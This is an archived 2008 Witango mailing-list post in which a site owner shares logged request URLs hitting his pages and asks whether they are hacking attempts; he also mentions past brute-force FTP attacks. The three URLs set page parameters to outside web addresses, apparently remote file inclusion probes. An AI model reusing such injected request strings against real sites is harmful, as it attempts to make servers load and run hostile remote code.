  From: Fogelson, Steve
  To: witango-talk@witango.com
  Sent: Thursday, February 28, 2008 7:44 AM
  Subject: Witango-Talk: Curiuos

  Hi,

  Here is a sample of urls that are being submitted to some of my sites. They
are reported as errors as I'm using Scott's error reporting routine.

www.xxxxxx.com/Category/2lvl1lstbx.taf?Master_ID=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&cat=150

www.xxx.com/main.taf?Cat=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fcontent%2Fugi%2Fvipo%2F&RD=1&_start=

www.xxxx.com/custom.taf?cpage=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F

  I checked the ip address and they are coming from Amsterdam. Does this look
like possible "cross-scripting" attempts or some other "hack" on their part?

  Some time back I had to resort to white-listing ip addresses on my ftp
servers as brute force account and password attacks were originating from
Amsterdam.

  Thanks

  Steve Fogelson

4:34 PM